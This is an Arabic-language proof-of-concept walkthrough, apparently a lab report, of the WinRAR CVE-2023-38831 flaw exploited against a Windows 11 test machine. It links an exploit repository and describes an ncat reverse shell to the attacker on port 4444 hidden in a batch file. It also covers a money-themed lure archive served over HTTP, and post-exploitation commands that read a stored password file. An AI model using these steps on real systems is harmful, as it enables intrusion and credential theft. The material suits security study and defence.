
عرض توضيحي لـ POC حول CVE-2023-38831
عرض توضيحي (POC) لثغرة CVE-2023-38831
وصف موجز للثغرة الأمنية
كيف تعمل الثغرة؟

الجزء الأول من الاستغلال
سيتم تنفيذ الجزء الأول على جهاز المهاجم لبدء الاستغلال.

1) أولاً، سنحتاج إلى إنشاء مجلد الاستغلال الذي يحتوي على المرفق الخبيث، “pdf”، وكود بايثون الخاص بالاستغلال وسكربت bat باستخدام الأمر التالي: “git clone https://github.com/HDCE-inc/CVE-2023-38831”

2) هذا ما يحتويه المجلد قبل تنفيذ أي استغلال،

3) معرفة عنوان IP لجهاز كالي عبر ifconfig:

4) سنقوم بعد ذلك بتعديل السكربت الموجود في script.bat إلى سطر الأوامر التالي (في الصورة أعلاه)
“start” لبدء عملية سطر الأوامر، و“/min” لتصغير موجه الأوامر في الخلفية، وncat لبدء الاتصال بعنوان IP الخاص بالمهاجم عبر المنفذ 4444، وأخيرًا -e cmd.exe لتنفيذ سطر الأوامر في موجه الأوامر.

5) يوضح هذا شرح كود exploit.py التالي:
1 يشير إلى إدخال المستخدم لاسم ملف الطُعم وهو document.pdf، واسم ملف السكربت وهو bat.script، والمخرجات التي تظهر للضحية كملف RAR، وفي هذه الحالة سنحفظه باسم getrich.rar.
2 يشير إلى الفحوصات التي تتم للتحقق من وجود الملفات في مجلد CVE-2023-38831 على جهاز كالي لينكس بالتسمية الصحيحة، وإذا كانت التسمية خاطئة أو كان الملف مكررًا، ستتم طباعة رسالة خطأ وسيتوقف البرنامج ويخرج.
3 يشير إلى إنشاء وجهة ملفات مؤقتة باستخدام os.mkdir() لتخزين الملف المنشأ حديثًا قبل ضغطه في أرشيف واستخدامه كمساحة عمل.
4 يشير إلى سطر النسخ، shutil.copyfile، لنسخ كل من ملف الطُعم والسكربت وتخزينهما في الدلائل الخاصة بهما داخل “tmp” لضمان أن جميع الملفات الضرورية صحيحة وفي مكانها قبل الانتقال إلى الخطوة التالية. أما الخطوة التالية، shutil.make_archieve، فتنشئ أرشيفًا من “tmp” يسمى “tmp.zip” يحتوي على كل شيء في مجلد “tmp”.
5 يشير إلى نجاح تشغيل الكود أعلاه والإنشاء الناجح لملف RAR كاستغلال عبر إدخال المستخدم لملف الطُعم وملف السكربت واسم ملف الإخراج.

6) بعد الحصول على عنوان IP الخاص بنا وتعديل سكربت bat، يمكننا الآن المتابعة لإنشاء ملف “.rar” الخبيث بتشغيل الأمر “python exploit.py”
سيطلب exploit.py من المستخدم إدخال 3 حقول: اسم ملف الطُعم الموجود وهو document.pdf، واسم ملف السكربت الذي عدلناه سابقًا وهو script.bat، واسم ملف RAR الناتج لإغراء الضحية بتنزيل الملف والنقر عليه، الأمر الذي يتطلب اسمًا مناسبًا، وفي هذه الحالة استخدمنا “steps-to-generate-income.rar”. عندها يصبح CVE-2023-38831 جاهزًا لاستغلال جهاز الضحية.
الجزء الثاني من الاستغلال
سيتم تنفيذ الجزء الثاني على كل من جهاز كالي وجهاز الضحية، وهو جهاز افتراضي يعمل بنظام Windows 11.

1) سنقوم أولاً إما بإنشاء موقع ويب خبيث أو إرسال المرفق إلى الضحية.
على الجانب الأيسر، سننفذ “python -m http.server 8080”. هذا الأمر هو عملية لالتقاط عنوان IP الذي يصل إلى هذا الرابط الخبيث، مما يمكننا من معرفة عنوان IP الخاص بالضحية، ويستمع لطلبات HTTP المختلفة مثل “200” من عنوان IP محدد. على الجانب الأيمن، يتم إغراء الضحية بالوصول إلى عنوان IP هذا وتحميل الملف “steps-to-generate-income.rar”.

2) بمجرد إغراء الضحية بنجاح لتحميل الملف الخبيث “steps-to-generate-income.rar”، سيظهر عنوان IP الذي قام بتحميل الملف مع الإطار الزمني. من هذه المعلومات، يمكننا الحصول على عنوان IP الخاص بالضحية.

3) سنقوم بعد ذلك بإعداد ncat على المنفذ 4444 على جهاز كالي، لأن المنفذ 4444 يجب أن يتزامن مع نفس المنفذ المكتوب في script.bat ليتم تنفيذه على جهاز الضحية.
بمجرد أن ينقر الضحية على document.pdf، سيقوم bat.script بتشغيل سطر الأوامر وتصغيره في الخلفية فورًا، مما يسمح بإنشاء اتصال خلفي (backdoor) للمهاجم.

4) سنكون قادرين بعد ذلك على تشغيل أوامر مختلفة على جهاز الضحية مثل “C:\Windows” ثم “dir” لعرض جميع ملفات exe المختلفة المخزنة.
فيما يلي ثلاثة أوامر تم تشغيلها على جهاز الضحية:
الأمر الأول المميز بالرقم “1” هو “net user” لمعرفة عدد الحسابات الموجودة، ومن هذا يمكننا استنتاج أن هناك حسابًا واحدًا فقط وهو W11.
الأمر الثاني المميز بالرقم “2” هو “systeminfo” لفهم المزيد عن جهاز الضحية وصلاحيات المستخدم، وفي هذه الحالة تكون صلاحية مسؤول (administrator).
الأمر الثالث المميز بالرقم “3” هو التنقل عبر مجلدات عشوائية، وفي هذه الحالة سنشغل أوامر مثل “C:\Users\W11” ثم “dir” لمعرفة أنواع الملفات والمجلدات، ثم “C:\Users\W11\Documents” ثم “dir” لمعرفة محتويات مجلد Documents، ولحسن الحظ قام هذا المستخدم بحفظ كلمة المرور في notepad.txt. ثم نقوم بطباعة تفاصيل هذا الملف في سطر الأوامر لكشف التفاصيل، “type secret.txt”. تُظهر النتيجة أننا من خلال سطر الأوامر هذا قادرون على قراءة وكتابة وتعديل الملفات على جهاز الضحية، حيث يمكن أيضًا اتخاذ إجراءات إضافية مثل زرع keylogger لجعل جهاز الضحية أكثر عرضة للاختراق وكشف المزيد من المعلومات الحساسة.

5) أخيرًا، يمكننا إنشاء ملف notepad على سطح مكتب المستخدم بتشغيل هذا الأمر
“echo "You've been hacked, please go to testingwebsite" > C:\Users\W11\D\hacked.txt” وسيتم إنشاء hacked.txt على سطح مكتب المستخدم لإظهار الضحية أن جهازه قد تم استغلاله.
Deland-Han. (2014, February 19). Dynamic link library (DLL) - Windows Client. Microsoft Learn. https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/dynamic-link-library
Gillis, A. S. (2023, September 26). principle of least privilege (POLP). Security. https://www.techtarget.com/searchsecurity/definition/principle-of-least-privilege-POLP
GmbH, W. (n.d.). WinRAR 7.00 Final released. WinRAR Latest News. https://www.win-rar.com/singlenewsview.html?&L=0&cHash=c5bf79590657e32554c6683296a8e8aa&tx_ttnews%5Btt_news%5D=232
Lab, S. (2023, September 26). Analysis of CVE-2023-38831 Zero-Day vulnerability in WinRAR. Penetration Testing and CyberSecurity Solution - SecureLayer7. https://blog.securelayer7.net/analysis-of-cve-2023-38831-zero-day-vulnerability-in-winrar/
Patch management: benefits and best practices | Balbix. (2022, October 22). Balbix. https://www.balbix.com/insights/patch-management-benefits-and-best-practices/
Research, U. T. (2023, November 17). WinRAR CVE-2023-38831 Vulnerability: Malware Exploits & APT Attacks. https://www.uptycs.com/blog/cve-2023-38831-winrar-zero-day
Slavin, B. (2024, March 18). Common DMARC problems faced by users | DMARC Report. DMARC Report. https://dmarcreport.com/blog/common-dmarc-problems-faced-by-users/
ThreatLocker. (2023, September 11). WinRAR Remote Code Execution. ThreatLocker. https://www.threatlocker.com/blog/winrar-remote-code-execution
Traders’ Dollars in Danger: CVE-2023-38831 zero-Day vulnerability in WinRAR exploited by cybercriminals to target traders. (2023, August 23). Group-IB. https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
Vulnera. (2023, November 16). DarkCasino: a new APT threat leveraging WinRAR vulnerability - VULNERA. VULNERA - Vulnerability Management. Simplified. https://vulnera.com/newswire/darkcasino-a-new-apt-threat-leveraging-winrar-vulnerability/